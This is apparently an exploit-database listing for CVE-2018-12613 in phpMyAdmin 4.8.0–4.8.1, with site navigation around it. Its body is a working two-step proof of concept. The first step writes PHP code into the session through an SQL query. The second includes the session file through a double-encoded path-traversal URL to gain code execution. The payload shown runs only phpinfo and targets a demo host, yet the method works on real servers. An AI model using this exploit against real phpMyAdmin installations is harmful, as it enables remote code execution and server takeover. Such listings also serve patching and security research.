[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMyAdmin 4.8.1 Code Execution / Local File Inclusion Vulnerabilities

Author
VulnSpy
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-30622
Category
web applications
Date add
22-06-2018
CVE
CVE-2018-12613
Platform
php
# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.0, 4.8.1
# Tested on: php7 mysql5
# CVE : CVE-2018-12613
 
1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

#  0day.today [2024-12-24]  #